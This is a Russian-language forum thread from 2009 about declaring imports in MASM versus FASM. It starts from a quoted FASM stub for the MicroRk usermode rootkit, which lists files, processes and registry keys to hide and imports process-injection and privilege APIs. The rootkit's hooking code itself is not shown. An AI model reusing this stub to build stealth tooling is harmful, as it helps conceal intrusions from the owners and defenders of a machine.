Секция импорта на МАСМ-е

Сейчас на форуме: tyns777, zds, JustLife (+4 невидимых)

Посл.ответ	Сообщение
DaRKSiDE Ранг: 462.8 (мудрец), 468thx Активность: 0.28↘0 Статус: Участник Only One!	Создано: 21 апреля 2009 06:48 · Личное сообщение · #1 Наткнулся на фасмовский исходник - Code: format PE GUI 4.0 include '%fasminc%\win32a.inc' section '.text' code readable writeable executable include 'micrork.inc' HiddenFiles db '_;hdfile;tp7;BKY;', 0 HiddenProcesses db 'win;total;', 0 HiddenRegKeys db 'bo;hrt;', 0 HiddenRegValues db 'group;', 0 TrueProcesses db 'tproc;prv;', 0 entry $ call InitRootkit push TrueProcesses push HiddenRegValues push HiddenRegKeys push HiddenProcesses push HiddenFiles call SetHidden ret section '.idata' import data readable writeable library kernel32, 'kernel32.dll', advapi32, 'advapi32.dll', ntdll, 'ntdll.dll' import kernel32, VirtualAllocEx, 'VirtualAllocEx', DuplicateHandle, 'DuplicateHandle', WriteProcessMemory, 'WriteProcessMemory', CreateRemoteThread, 'CreateRemoteThread', CreateToolhelp32Snapshot, 'CreateToolhelp32Snapshot', Process32First, 'Process32First', Process32Next, 'Process32Next', OpenProcess, 'OpenProcess', CloseHandle, 'CloseHandle', VirtualProtect, 'VirtualProtect', MapViewOfFile, 'MapViewOfFile', ReadProcessMemory, 'ReadProcessMemory', GetModuleFileNameW, 'GetModuleFileNameW', CreateFileMapping, 'CreateFileMappingA' import advapi32, OpenProcessToken, 'OpenProcessToken', LookupPrivilegeValue, 'LookupPrivilegeValueA', AdjustTokenPrivileges, 'AdjustTokenPrivileges' import ntdll, ZwQueryDirectoryFile, 'ZwQueryDirectoryFile', wcsnicmp, '_wcsnicmp', wcscpy, 'wcscpy', ZwQuerySystemInformation, 'ZwQuerySystemInformation', ZwEnumerateValueKey, 'ZwEnumerateValueKey', wcsncpy, 'wcsncpy', ZwClose, 'ZwClose', ZwOpenKey, 'ZwOpenKey', ZwEnumerateKey, 'ZwEnumerateKey', RtlInitUnicodeString, 'RtlInitUnicodeString', wcsicmp, '_wcsicmp', mbstowcs, 'mbstowcs', ZwCreateThread, 'ZwCreateThread' Возможно ли реализовать тоже самое на МАСМ-е? И как это сделать? Подскажите плиз... ----- aLL rIGHTS rEVERSED!

Jupiter Ранг: 605.2 (!), 341thx Активность: 0.47↘0.25 Статус: Модератор Research & Development	Создано: 21 апреля 2009 08:57 · Поправил: Jupiter · Личное сообщение · #2 если вопрос именно в импорте - то в масме достаточно подключить инклуд и либу соответсвтующей длл Code: include kernel32.inc includelib kernel32.lib ----- EnJoy!
progopis Ранг: 101.0 (ветеран), 344thx Активность: 1.15↘0 Статус: Участник	Создано: 21 апреля 2009 11:13 · Личное сообщение · #3 Так гибко управлять импортом как в FASM, вроде бы в MASM нельзя. Всё что можно - указать только нужные функции в файлах *.inc.
AlexZ Ранг: 203.3 (наставник) Активность: 0.22↘0 Статус: Участник UPX Killer -d	Создано: 21 апреля 2009 16:28 · Личное сообщение · #4 А в чем прикол в первом сорце? ----- Я медленно снимаю с неё UPX... FF_User
Coderess Ранг: 355.4 (мудрец), 55thx Активность: 0.32↘0 Статус: Uploader 5KRT	Создано: 21 апреля 2009 18:29 · Поправил: Coderess · Личное сообщение · #5 В том, что можно секцию создать используюя директиву Code: section '.text' code readable writeable executable Не совсем понял вопрос. ----- Gutta cavat lapidem. Feci, quod potui. Faciant meliora potentes
Jupiter Ранг: 605.2 (!), 341thx Активность: 0.47↘0.25 Статус: Модератор Research & Development	Создано: 21 апреля 2009 18:43 · Личное сообщение · #6 да нет никакихх приколов - обычный сорс фасма Coderess пишет: В том, что можно секцию создать используюя директиву вообще-то речь об импорте, а не о секции кода к тому же при компиляции в масме линкеру можно сказать, чтобы секция была записываемой собсно исходник: MicroRk - Very small usermode rootkit by Ms-Rem Простой юзермодный руткит написаный целиком на fasm. Оформлен в виде библиотеки. Есть тестовые примеры использования. Руткит построен на перехвате NativeApi и умеет скрывать процессы, файлы, ключи и значения в реестре. Применять стоит только в маленьких прогах, для более серьезных вещей автор советует лезть в ядро. ----- EnJoy!
AlexZ Ранг: 203.3 (наставник) Активность: 0.22↘0 Статус: Участник UPX Killer -d	Создано: 21 апреля 2009 19:36 · Личное сообщение · #7 Coderess пишет: В том, что можно секцию создать используюя директиву В МАСМ или ТАСМ такое тоже можно, не помню точно. Надо книжку поднять, посмотреть... ----- Я медленно снимаю с неё UPX... FF_User
ne_viens Ранг: 0.0 (гость) Активность: 0=0 Статус: Участник	Создано: 23 апреля 2009 18:27 · Поправил: Модератор · Личное сообщение · #8 // Удалено как оффтоп
progopis Ранг: 101.0 (ветеран), 344thx Активность: 1.15↘0 Статус: Участник	Создано: 23 апреля 2009 18:33 · Поправил: progopis · Личное сообщение · #9 Чтобы народ не регистрировался на форуме дабы запостить бред не относящийся к теме, поставил на тему "ключ".

Для печати